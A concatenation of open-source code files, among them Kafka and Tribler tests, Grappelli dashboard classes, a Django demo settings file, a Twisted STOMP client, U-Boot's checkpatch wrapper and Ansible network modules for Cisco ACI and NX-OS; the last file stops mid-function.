frozenset([TopicPartition(self.TOPIC, 2), TopicPartition(self.TOPIC, 3)])]), \
"Mismatched assignment: %s" % assignment
def _verify_roundrobin_assignment(self, consumer):
assignment = set([frozenset(x) for x in consumer.current_assignment().values()])
assert assignment == set([
frozenset([TopicPartition(self.TOPIC, 0), TopicPartition(self.TOPIC, 2)]),
frozenset([TopicPartition(self.TOPIC, 1), TopicPartition(self.TOPIC, 3)])]), \
"Mismatched assignment: %s" % assignment
@cluster(num_nodes=4)
def rolling_update_test(self):
"""
Verify rolling updates of partition assignment strategies works correctly. In this
test, we use a rolling restart to change the group's assignment strategy from "range"
to "roundrobin." We verify after every restart that all members are still in the group
and that the correct assignment strategy was used.
"""
# initialize the consumer using range assignment
consumer = self.setup_consumer(self.TOPIC, assignment_strategy=self.RANGE)
consumer.start()
self.await_all_members(consumer)
self._verify_range_assignment(consumer)
# change consumer configuration to prefer round-robin assignment, but still support range assignment
consumer.assignment_strategy = self.ROUND_ROBIN + "," + self.RANGE
# restart one of the nodes and verify that we are still using range assignment
consumer.stop_node(consumer.nodes[0])
consumer.start_node(consumer.nodes[0])
self.await_all_members(consumer)
self._verify_range_assignment(consumer)
# now restart the other node and verify that we have switched to round-robin
consumer.stop_node(consumer.nodes[1])
consumer.start_node(consumer.nodes[1])
self.await_all_members(consumer)
self._verify_roundrobin_assignment(consumer)
# if we want, we can now drop support for range assignment
consumer.assignment_strategy = self.ROUND_ROBIN
for node in consumer.nodes:
consumer.stop_node(node)
consumer.start_node(node)
self.await_all_members(consumer)
self._verify_roundrobin_assignment(consumer)
| apache-2.0 |
MaxVanDeursen/tribler | Tribler/Test/Core/Upgrade/test_torrent_upgrade_64_65.py | 1 | 1920 | import os
import shutil
from twisted.internet.defer import inlineCallbacks
from Tribler.Core.Upgrade.torrent_upgrade65 import TorrentMigrator65
from Tribler.Core.leveldbstore import LevelDbStore
from Tribler.Test.Core.Upgrade.test_torrent_upgrade_63_64 import AbstractTorrentUpgrade63to64
from Tribler.dispersy.util import blocking_call_on_reactor_thread
class AbstractTorrentUpgrade64to65(AbstractTorrentUpgrade63to64):
@blocking_call_on_reactor_thread
@inlineCallbacks
def setUp(self):
yield super(AbstractTorrentUpgrade64to65, self).setUp()
leveldb_path = os.path.join(self.session_base_dir, "leveldbstore")
os.mkdir(leveldb_path)
self.torrent_store = LevelDbStore(leveldb_path)
self.torrent_upgrader = TorrentMigrator65(self.torrent_collecting_dir,
self.session_base_dir, self.torrent_store)
def tearDown(self, annotate=True):
self.torrent_store.close()
super(AbstractTorrentUpgrade64to65, self).tearDown()
def assert_upgrade_successful(self):
self.assertGreater(self.torrent_upgrader.torrent_files_migrated, 0)
self.assertGreater(self.torrent_upgrader.processed_file_count, 0)
self.assertGreater(len(self.torrent_store), 0)
class TestTorrentUpgrade63to64(AbstractTorrentUpgrade64to65):
def test_upgrade_success(self):
self.torrent_upgrader._migrate_torrent_collecting_dir()
self.assert_upgrade_successful()
def test_torrent_collecting_dir_no_dir(self):
shutil.rmtree(self.torrent_collecting_dir)
self.write_data_to_file(self.torrent_collecting_dir)
self.torrent_upgrader._migrate_torrent_collecting_dir()
self.assertEqual(self.torrent_upgrader.torrent_files_migrated, 0)
self.assertEqual(self.torrent_upgrader.processed_file_count, 0)
self.assertEqual(len(self.torrent_store), 0)
| lgpl-3.0 |
cselis86/edx-platform | common/test/acceptance/pages/lms/matlab_problem.py | 179 | 1024 | """
Matlab Problem Page.
"""
from bok_choy.page_object import PageObject
class MatlabProblemPage(PageObject):
"""
View of matlab problem page.
"""
url = None
def is_browser_on_page(self):
return self.q(css='.ungraded-matlab-result').present
@property
def problem_name(self):
"""
Return the current problem name.
"""
return self.q(css='.problem-header').text[0]
def set_response(self, response_str):
"""
Input a response to the prompt.
"""
input_css = "$('.CodeMirror')[0].CodeMirror.setValue('{}');".format(response_str)
self.browser.execute_script(input_css)
def click_run_code(self):
"""
Click the run code button.
"""
self.q(css='input.save').click()
self.wait_for_ajax()
def get_grader_msg(self, class_name):
"""
Returns the text value of given class.
"""
self.wait_for_ajax()
return self.q(css=class_name).text
| agpl-3.0 |
dahool/vertaal | grappelli/dashboard/dashboards.py | 6 | 6370 | # coding: utf-8
"""
Module where grappelli dashboard classes are defined.
"""
# DJANGO IMPORTS
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from django import forms
# GRAPPELLI IMPORTS
from grappelli.dashboard import modules
from grappelli.dashboard.utils import get_admin_site_name
class Dashboard(object):
"""
Base class for dashboards.
The Dashboard class is a simple python list that has three additional
properties:
``title``
The dashboard title, by default, it is displayed above the dashboard
in a ``h2`` tag. Default value: 'Dashboard'.
``template``
The template to use to render the dashboard.
Default value: 'admin_tools/dashboard/dashboard.html'
``columns``
An integer that represents the number of columns for the dashboard.
Default value: 2.
If you want to customize the look of your dashboard and it's modules, you
can declare css stylesheets and/or javascript files to include when
rendering the dashboard (these files should be placed in your
media path), for example::
from admin_tools.dashboard import Dashboard
class MyDashboard(Dashboard):
class Media:
css = {
'all': (
'css/mydashboard.css',
'css/mystyles.css',
),
}
js = (
'js/mydashboard.js',
'js/myscript.js',
)
Here's an example of a custom dashboard::
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from admin_tools.dashboard import modules, Dashboard
class MyDashboard(Dashboard):
# we want a 3 columns layout
columns = 3
def __init__(self, **kwargs):
super(MyDashboard, self).__init__(**kwargs)
# append an app list module for "Applications"
self.children.append(modules.AppList(
title=_('Applications'),
exclude=('django.contrib.*',),
))
# append an app list module for "Administration"
self.children.append(modules.AppList(
title=_('Administration'),
models=('django.contrib.*',),
))
# append a recent actions module
self.children.append(modules.RecentActions(
title=_('Recent Actions'),
limit=5
))
"""
# Using Django's Media meta class
__metaclass__ = forms.MediaDefiningClass
def _media(self):
return forms.Media()
media = property(_media)
title = _('Dashboard')
template = 'grappelli/dashboard/dashboard.html'
columns = 2
children = None
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self.__class__, key):
setattr(self, key, kwargs[key])
self.children = self.children or []
def init_with_context(self, context):
"""
Sometimes you may need to access context or request variables to build
your dashboard, this is what the ``init_with_context()`` method is for.
This method is called just before the display with a
``django.template.RequestContext`` as unique argument, so you can
access to all context variables and to the ``django.http.HttpRequest``.
"""
pass
def get_id(self):
"""
Internal method used to distinguish different dashboards in js code.
"""
return 'grp-dashboard'
class DefaultIndexDashboard(Dashboard):
"""
The default dashboard displayed on the admin index page.
To change the default dashboard you'll have to type the following from the
commandline in your project root directory::
python manage.py customdashboard
And then set the `GRAPPELLI_INDEX_DASHBOARD`` settings variable to
point to your custom index dashboard class.
"""
def init_with_context(self, context):
site_name = get_admin_site_name(context)
# append a link list module for "quick links"
self.children.append(modules.LinkList(
_('Quick links'),
collapsible=False,
children=[
[_('Return to site'), '/'],
[_('Change password'),
reverse('%s:password_change' % site_name)],
[_('Log out'), reverse('%s:logout' % site_name)],
]
))
# append an app list module for "Applications"
self.children.append(modules.AppList(
_('Applications'),
exclude=('django.contrib.*',),
))
# append an app list module for "Administration"
self.children.append(modules.AppList(
_('Administration'),
models=('django.contrib.*',),
))
# append a recent actions module
self.children.append(modules.RecentActions(_('Recent Actions'), 5))
# append a feed module
self.children.append(modules.Feed(
_('Latest Django News'),
feed_url='http://www.djangoproject.com/rss/weblog/',
limit=5
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Support'),
children=[
{
'title': _('Django documentation'),
'url': 'http://docs.djangoproject.com/',
'external': True,
},
{
'title': _('Django "django-users" mailing list'),
'url': 'http://groups.google.com/group/django-users',
'external': True,
},
{
'title': _('Django irc channel'),
'url': 'irc://irc.freenode.net/django',
'external': True,
},
]
))
| gpl-3.0 |
gotlium/django-geoip-redis | demo/demo/settings.py | 1 | 5146 | # Django settings for demo project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('root', 'root@localhost'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.4/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'rl+c(vz0tc(&svm*va9=+$q_$c%i#qb0p@tkc-p37y_$b@aj6e'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'geoip.middleware.GeoMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'demo.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'demo.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'grappelli',
'django.contrib.admin',
'django_extensions',
# 'djcelery',
'south',
'geoip',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
GRAPPELLI_ADMIN_TITLE = 'Demo'
GEO_BACKEND = 'redis'
GEO_REDIS_TYPE = 'name'
GEO_REDIS_DB = 4
try:
from .local_settings import *
except ImportError:
pass
| gpl-3.0 |
Wilee999/panda3d | direct/src/leveleditor/AnimGlobals.py | 8 | 1326 | """
This contains data structure and constants related with animation handling.
"""
# index for keyFramesInfo list structure
# data strucrure: {[nodeUID, propertyName] : [frameNum,
# value,
# [inSlopeX, inSlopeY],
# [outSlopeX, outSlopeY]]}
UID = 0
PROP_NAME = 1
FRAME = 0
VALUE = 1
INSLOPE = 2
OUTSLOPE = 3
# index for curveAnimation list structure
# data strucrure: {[nodeUID, curveUID] : [nodeUID,
# curveUID,
# time]}
NODE = 0
CURVE = 1
NODE = 0
CURVE = 1
TIME = 2
# index for animation curve generation information list structure(self.X, self.Y, self.Z in GraphEditorUI)
# data structur: [key,
# i ,
# [[keyFrameX, keyFrameY], keyFrame_select],
# [[inTangentX, inTangentY], inTangent_select],
# [[outTangentX, outTangentY], outTangent_select],
# [inSlopeX, inSlopeY],
# [outSlopeX, outSlopeY]]
KEY = 0
I = 1
KEYFRAME = 2
IN_TANGENT = 3
OUT_TANGENT = 4
IN_SLOPE = 5
OUT_SLOPE = 6
LOCAL_VALUE = 0
SELECT = 1
#index for coordinate
X = 0
Y = 1
Z = 2
| bsd-3-clause |
ymow/nowin_core | nowin_core/message_bus/stomp.py | 2 | 4795 | import logging
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks
from twisted.internet.defer import maybeDeferred
from twisted.internet.defer import returnValue
from nowin_core.patterns import observer
from nowin_core.stomp import async_client
class STOMPMessageBus(object):
def __init__(
self,
host,
user,
password=None,
logger=None
):
self.logger = logger
if self.logger is None:
self.logger = logging.getLogger(__name__)
self.host = host
self.user = user
self.password = password
self.client = None
# called when we are authorized
self.auth_event = observer.Subject()
# called when connection lost
self.conn_lost_event = observer.Subject()
# called when connection to host failed
self.conn_failed_event = observer.Subject()
#: is this connection closed
self.closed = False
#: client event subscribe ids
self._sub_ids = []
self.logger.info('Create message bus, host=%s, user=%s',
self.host, self.user)
def handleConnLost(self):
"""Called when connection lost
"""
self.close()
self.conn_lost_event()
def handleAuth(self):
"""Called when we are authorized
"""
self.auth_event()
@inlineCallbacks
def connect(self):
"""Connect to peer
"""
from twisted.internet.protocol import ClientCreator
self.closed = False
if self.client is not None:
self.logger.warn('Already connected')
returnValue(None)
self.logger.debug('Logging in as %s ...', self.user)
creator = ClientCreator(reactor, async_client.STOMPClient)
try:
self.logger.info('Connecting to %s', self.host)
self.client = yield creator.connectTCP(*self.host)
except Exception, e:
self.logger.info('Failed to connect to %s', self.host)
self.client = None
self.conn_failed_event()
returnValue(e)
# already closed
if self.closed:
self.logger.warn('Abort connection')
self.client.close()
self.client = None
return
self._sub_ids.append(
self.client.conn_lost_event.subscribe(self.handleConnLost))
self._sub_ids.append(
self.client.auth_event.subscribe(self.handleAuth))
try:
yield self.client.login(self.user, self.password)
except Exception, e:
self.logger.info('Failed to login as %s', self.user)
self.logger.exception(e)
self.conn_failed_event()
returnValue(e)
self.logger.info('Login as %s', self.user)
@inlineCallbacks
def send(self, dest, data):
"""Send data to message bus
"""
if self.client is None:
self.logger.warn('Not connected, ignore send cmd to %s', dest)
returnValue(None)
dest = str(dest)
self.logger.debug('Sending %s bytes to %s ...', len(data), dest)
yield maybeDeferred(self.client.send, dest, data)
self.logger.info('Sent %s bytes to %s', len(data), dest)
@inlineCallbacks
def subscribe(self, dest, callback):
"""Subscribe to specific destination, the callback will be called when
the there is message in the destination
"""
if self.client is None:
self.logger.warn('Not connected, ignore subscribe cmd to %s', dest)
returnValue(None)
dest = str(dest)
self.logger.debug('Subscribing to %s ...', dest)
yield maybeDeferred(self.client.subscribe, dest, callback)
self.logger.info('Subscribed to %s', dest)
@inlineCallbacks
def unsubscribe(self, dest):
"""Unsubscribe from message bus
"""
if self.client is None:
self.logger.warn('Not connected, ignore Unsubscribe cmd to %s',
dest)
returnValue(None)
self.logger.debug('Unsubscribe... from queue %s', dest)
yield maybeDeferred(self.client.subscribe, dest)
self.logger.info('Unsubscribed from queue %s', dest)
def close(self):
"""Close connection to message bus
"""
if self.client is None or self.closed:
self.logger.warn('Already closed')
return
self.logger.debug('Closing message bus ...')
for sid in self._sub_ids:
sid.unsubscribe()
self._sub_ids = []
self.client.close()
self.client = None
self.closed = True
self.logger.info('Closed message bus')
| mit |
falstaff84/u-boot | tools/patman/checkpatch.py | 31 | 6898 | # Copyright (c) 2011 The Chromium OS Authors.
#
# See file CREDITS for list of people who contributed to this
# project.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
import collections
import command
import gitutil
import os
import re
import sys
import terminal
def FindCheckPatch():
top_level = gitutil.GetTopLevel()
try_list = [
os.getcwd(),
os.path.join(os.getcwd(), '..', '..'),
os.path.join(top_level, 'tools'),
os.path.join(top_level, 'scripts'),
'%s/bin' % os.getenv('HOME'),
]
# Look in current dir
for path in try_list:
fname = os.path.join(path, 'checkpatch.pl')
if os.path.isfile(fname):
return fname
# Look upwwards for a Chrome OS tree
while not os.path.ismount(path):
fname = os.path.join(path, 'src', 'third_party', 'kernel', 'files',
'scripts', 'checkpatch.pl')
if os.path.isfile(fname):
return fname
path = os.path.dirname(path)
print >> sys.stderr, ('Cannot find checkpatch.pl - please put it in your ' +
'~/bin directory or use --no-check')
sys.exit(1)
def CheckPatch(fname, verbose=False):
"""Run checkpatch.pl on a file.
Returns:
namedtuple containing:
ok: False=failure, True=ok
problems: List of problems, each a dict:
'type'; error or warning
'msg': text message
'file' : filename
'line': line number
errors: Number of errors
warnings: Number of warnings
checks: Number of checks
lines: Number of lines
stdout: Full output of checkpatch
"""
fields = ['ok', 'problems', 'errors', 'warnings', 'checks', 'lines',
'stdout']
result = collections.namedtuple('CheckPatchResult', fields)
result.ok = False
result.errors, result.warning, result.checks = 0, 0, 0
result.lines = 0
result.problems = []
chk = FindCheckPatch()
item = {}
result.stdout = command.Output(chk, '--no-tree', fname)
#pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE)
#stdout, stderr = pipe.communicate()
# total: 0 errors, 0 warnings, 159 lines checked
# or:
# total: 0 errors, 2 warnings, 7 checks, 473 lines checked
re_stats = re.compile('total: (\\d+) errors, (\d+) warnings, (\d+)')
re_stats_full = re.compile('total: (\\d+) errors, (\d+) warnings, (\d+)'
' checks, (\d+)')
re_ok = re.compile('.*has no obvious style problems')
re_bad = re.compile('.*has style problems, please review')
re_error = re.compile('ERROR: (.*)')
re_warning = re.compile('WARNING: (.*)')
re_check = re.compile('CHECK: (.*)')
re_file = re.compile('#\d+: FILE: ([^:]*):(\d+):')
for line in result.stdout.splitlines():
if verbose:
print line
# A blank line indicates the end of a message
if not line and item:
result.problems.append(item)
item = {}
match = re_stats_full.match(line)
if not match:
match = re_stats.match(line)
if match:
result.errors = int(match.group(1))
result.warnings = int(match.group(2))
if len(match.groups()) == 4:
result.checks = int(match.group(3))
result.lines = int(match.group(4))
else:
result.lines = int(match.group(3))
elif re_ok.match(line):
result.ok = True
elif re_bad.match(line):
result.ok = False
err_match = re_error.match(line)
warn_match = re_warning.match(line)
file_match = re_file.match(line)
check_match = re_check.match(line)
if err_match:
item['msg'] = err_match.group(1)
item['type'] = 'error'
elif warn_match:
item['msg'] = warn_match.group(1)
item['type'] = 'warning'
elif check_match:
item['msg'] = check_match.group(1)
item['type'] = 'check'
elif file_match:
item['file'] = file_match.group(1)
item['line'] = int(file_match.group(2))
return result
def GetWarningMsg(col, msg_type, fname, line, msg):
'''Create a message for a given file/line
Args:
msg_type: Message type ('error' or 'warning')
fname: Filename which reports the problem
line: Line number where it was noticed
msg: Message to report
'''
if msg_type == 'warning':
msg_type = col.Color(col.YELLOW, msg_type)
elif msg_type == 'error':
msg_type = col.Color(col.RED, msg_type)
elif msg_type == 'check':
msg_type = col.Color(col.MAGENTA, msg_type)
return '%s: %s,%d: %s' % (msg_type, fname, line, msg)
def CheckPatches(verbose, args):
'''Run the checkpatch.pl script on each patch'''
error_count, warning_count, check_count = 0, 0, 0
col = terminal.Color()
for fname in args:
result = CheckPatch(fname, verbose)
if not result.ok:
error_count += result.errors
warning_count += result.warnings
check_count += result.checks
print '%d errors, %d warnings, %d checks for %s:' % (result.errors,
result.warnings, result.checks, col.Color(col.BLUE, fname))
if (len(result.problems) != result.errors + result.warnings +
result.checks):
print "Internal error: some problems lost"
for item in result.problems:
print GetWarningMsg(col, item.get('type', '<unknown>'),
item.get('file', '<unknown>'),
item.get('line', 0), item.get('msg', 'message'))
print
#print stdout
if error_count or warning_count or check_count:
str = 'checkpatch.pl found %d error(s), %d warning(s), %d checks(s)'
color = col.GREEN
if warning_count:
color = col.YELLOW
if error_count:
color = col.RED
print col.Color(color, str % (error_count, warning_count, check_count))
return False
return True
| gpl-2.0 |
ujenmr/ansible | lib/ansible/modules/network/aci/aci_tenant_action_rule_profile.py | 27 | 6462 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_tenant_action_rule_profile
short_description: Manage action rule profiles (rtctrl:AttrP)
description:
- Manage action rule profiles on Cisco ACI fabrics.
version_added: '2.4'
options:
action_rule:
description:
- The name of the action rule profile.
type: str
aliases: [ action_rule_name, name ]
description:
description:
- The description for the action rule profile.
type: str
aliases: [ descr ]
tenant:
description:
- The name of the tenant.
type: str
aliases: [ tenant_name ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: aci
notes:
- The C(tenant) used must exist before using this module in your playbook.
The M(aci_tenant) module can be used for this.
seealso:
- module: aci_tenant
- name: APIC Management Information Model reference
description: More information about the internal APIC class B(rtctrl:AttrP).
link: https://developer.cisco.com/docs/apic-mim-ref/
author:
- Dag Wieers (@dagwieers)
'''
# FIXME: Add more, better examples
EXAMPLES = r'''
- aci_tenant_action_rule_profile:
host: apic
username: admin
password: SomeSecretPassword
action_rule: '{{ action_rule }}'
description: '{{ descr }}'
tenant: '{{ tenant }}'
delegate_to: localhost
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: str
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: str
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: str
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: str
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: str
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
action_rule=dict(type='str', aliases=['action_rule_name', 'name']), # Not required for querying all objects
tenant=dict(type='str', aliases=['tenant_name']), # Not required for querying all objects
description=dict(type='str', aliases=['descr']),
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['action_rule', 'tenant']],
['state', 'present', ['action_rule', 'tenant']],
],
)
action_rule = module.params['action_rule']
description = module.params['description']
state = module.params['state']
tenant = module.params['tenant']
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class='fvTenant',
aci_rn='tn-{0}'.format(tenant),
module_object=tenant,
target_filter={'name': tenant},
),
subclass_1=dict(
aci_class='rtctrlAttrP',
aci_rn='attr-{0}'.format(action_rule),
module_object=action_rule,
target_filter={'name': action_rule},
),
)
aci.get_existing()
if state == 'present':
aci.payload(
aci_class='rtctrlAttrP',
class_config=dict(
name=action_rule,
descr=description,
),
)
aci.get_diff(aci_class='rtctrlAttrP')
aci.post_config()
elif state == 'absent':
aci.delete_config()
aci.exit_json()
if __name__ == "__main__":
main()
| gpl-3.0 |
aioue/ansible | lib/ansible/modules/network/nxos/nxos_smu.py | 40 | 5987 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: nxos_smu
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Perform SMUs on Cisco NX-OS devices.
description:
- Perform software maintenance upgrades (SMUs) on Cisco NX-OS devices.
author: Gabriele Gerbino (@GGabriele)
notes:
- The module can only activate and commit a package,
not remove or deactivate it.
- Use C(transport=nxapi) to avoid connection timeout
options:
pkg:
description:
- Name of the remote package.
required: true
file_system:
description:
- The remote file system of the device. If omitted,
devices that support a file_system parameter will use
their default values.
required: false
default: null
'''
EXAMPLES = '''
- nxos_smu:
pkg: "nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm"
username: "{{ un }}"
password: "{{ pwd }}"
host: "{{ inventory_hostname }}"
'''
RETURN = '''
file_system:
description: The remote file system of the device.
returned: always
type: string
sample: "bootflash:"
pkg:
description: Name of the remote package
type: string
returned: always
sample: "nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm"
updates:
description: commands sent to the device
returned: always
type: list
sample: ["install add bootflash:nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm",
"install activate bootflash:nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm force",
"install commit bootflash:nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from ansible.module_utils.nxos import get_config, load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
import time
import collections
import re
import re
def execute_show_command(command, module, command_type='cli_show'):
if module.params['transport'] == 'cli':
cmds = [command]
body = run_commands(module, cmds)
elif module.params['transport'] == 'nxapi':
cmds = [command]
body = run_commands(module, cmds)
return body
def remote_file_exists(module, dst, file_system='bootflash:'):
command = 'dir {0}/{1}'.format(file_system, dst)
body = execute_show_command(command, module, command_type='cli_show_ascii')
if 'No such file' in body[0]:
return False
return True
def apply_patch(module, commands):
for command in commands:
load_config(module, [command])
time.sleep(5)
if 'failed' in response:
module.fail_json(msg="Operation failed!", response=response)
def get_commands(module, pkg, file_system):
commands = []
splitted_pkg = pkg.split('.')
fixed_pkg = '.'.join(splitted_pkg[0:-1])
command = 'show install inactive'
inactive_body = execute_show_command(command, module,
command_type='cli_show_ascii')
command = 'show install active'
active_body = execute_show_command(command, module,
command_type='cli_show_ascii')
if fixed_pkg not in inactive_body[0] and fixed_pkg not in active_body[0]:
commands.append('install add {0}{1}'.format(file_system, pkg))
if fixed_pkg not in active_body[0]:
commands.append('install activate {0}{1} force'.format(
file_system, pkg))
command = 'show install committed'
install_body = execute_show_command(command, module,
command_type='cli_show_ascii')
if fixed_pkg not in install_body[0]:
commands.append('install commit {0}{1}'.format(file_system, pkg))
return commands
def main():
argument_spec = dict(
pkg=dict(required=True),
file_system=dict(required=False, default='bootflash:'),
include_defaults=dict(default=False),
config=dict(),
save=dict(type='bool', default=False)
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
pkg = module.params['pkg']
file_system = module.params['file_system']
changed = False
remote_exists = remote_file_exists(module, pkg, file_system=file_system)
if not remote_exists:
module.fail_json(msg="The requested package doesn't exist "
"on the device")
commands = get_commands(module, pkg, file_system)
if not module.check_mode and commands:
apply_patch(module, commands)
changed = True
if 'configure' in commands:
